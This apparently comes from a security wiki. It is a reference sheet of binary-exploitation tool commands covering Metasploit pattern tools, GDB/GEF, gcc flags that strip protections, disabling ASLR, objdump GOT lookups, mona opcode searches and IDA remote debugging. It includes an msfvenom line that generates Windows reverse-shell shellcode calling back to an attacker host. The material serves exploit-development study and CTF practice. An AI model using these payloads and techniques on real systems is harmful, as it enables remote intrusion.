# Exploiting Tools ## Metasploit ```text pattern_create.rb -l 3000 #Length pattern_offset.rb -l 3000 -q 5f97d534 #Search offset nasm_shell.rb nasm> jmp esp #Get opcodes msfelfscan -j esi /opt/fusion/bin/level01 ``` ### Shellcodes ```text msfvenom /p windows/shell_reverse_tcp LHOST= LPORT= [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c ``` ## GDB ### Install ```text apt-get install gdb ``` ### Parameters: **-q** --> No show banner **-x <file>** --> Auto-execute GDB instructions from here **-p <pid>** --> Attach to process #### Instructions > **disassemble main** --> Disassemble the function > **disassemble 0x12345678** > **set disassembly-flavor intel** > **set follow-fork-mode child/parent** --> Follow created process > **p system** --> Find the address of the system function > **help** > **quit** > **br func** --> Add breakpoint to function > **br \*func+23** > **br \*0x12345678 > del NUM** --> Delete that number of br > **watch EXPRESSION** --> Break if the value changes **> run** --> Execute **> start** --> Start and break in main > **n/next** --> Execute next instruction \(no inside\) > **s/step** --> Execute next instruction > **c/continue** --> Continue until next breakpoint > **set $eip = 0x12345678** --> Change value of $eip > **info functions** --> Info abount functions > **info functions func** --> Info of the funtion > **info registers** --> Value of the registers > **bt** --> Stack > **bt full** --> Detailed stack > **print variable** > **print 0x87654321 - 0x12345678** --> Caculate > **examine o/x/u/t/i/s dir\_mem/reg/puntero** --> Shows content in octal/hexa/10/bin/instruction/ascii * **x/o 0xDir\_hex** * **x/2x $eip** --> 2Words from EIP * **x/2x $eip -4** --> $eip - 4 * **x/8xb $eip** --> 8 bytes \(b-> byte, h-> 2bytes, w-> 4bytes, g-> 8bytes\) * **i r eip** --> Value of $eip * **x/w pointer** --> Value of the pointer * **x/s pointer** --> String pointed by the pointer * **x/xw &pointer** --> Address where the poiniter is located * **x/i $eip** —> Instructions of the EIP ### [GEF](https://github.com/hugsy/gef) ```bash checksec #Check protections p system #Find system function address search-pattern "/bin/sh" #Search in the process memory vmmap #Get memory mappings #Shellcode shellcode search x86 #Search shellcodes shellcode get 61 #Download shellcode number 61 #Patterns pattern create 200 #Generate length 200 pattern pattern search "avaaawaa" #Search for the offset of that substring pattern search $rsp #Search the offset given the content of $rsp ``` ### GDB server `gdbserver --multi 0.0.0.0:23947` \(in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine\) ## GCC **gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compile without protections **-o** --> Output **-g** --> Save code \(GDB will be able to see it\) **echo 0 > /proc/sys/kernel/randomize\_va\_space** --> To deactivate the ASLR in linux **To compile a shellcode: nasm -f elf assembly.asm** --> return a ".o" **ld assembly.o -o shellcodeout** --> Executable ## Objdump **-d** --> Disassemble executable sections \(see opcodes of a compiled shellcode, find ROP Gadgets, find function address...\) **-Mintel** --> Intel sintax **-t** --> Symbols table \(grep varBSS to get the address\) **-D** --> Disassemble all \(address of static variable\) **-s -j .dtors** --> Contenido de dtors **-s -j .got** --> Contenido de got **-TR** --> Relocations **ojdump -t --dynamic-relo ./exec \| grep puts** --> Address of "puts" to modify in GOT **objdump -TR ./exec \| grep exit\(func lib\)** —> Get address of all the functions inside the GOT ## Core dumps 1. Run `ulimit -c unlimited` before starting my program 2. Run `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` 3. sudo gdb --core=<path/core> --quiet ## More **ldd executable \| grep libc.so.6** --> Address \(if ASLR, then this change every time\) **for i in \`seq 0 20\`; do ldd <Ejecutable> \| grep libc; done** --> Loop to see if the address changes a lot **readelf -s /lib/i386-linux-gnu/libc.so.6 \| grep system** --> Offset of "system" **strings -a -t x /lib/i386-linux-gnu/libc.so.6 \| grep /bin/sh** --> Offset of "/bin/sh" **strace executable** --> Functions called by the executable **rabin2 -i ejecutable -->** Address of all the functions **/usr/share/metasploit-framework/tools/exploit/pattern\_create.rb --length 1000 /usr/share/metasploit-framework/tools/exploit/pattern\_offset.rb --length 1000 --query 1Ad2** ## **Inmunity debugger** ```bash !mona modules #Get protections, look for all false except last one (Dll of SO) !mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP) ``` ## IDA ### Debugging in remote linux Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux\_server_ or _linux\_server64_ inside the linux server and run it nside the folder that contains the binary: ```text ./linux_server64 -Ppass ``` Then, configure the debugger: Debugger \(linux remote\) --> Proccess options...: ![](../../.gitbook/assets/image%20%28112%29.png)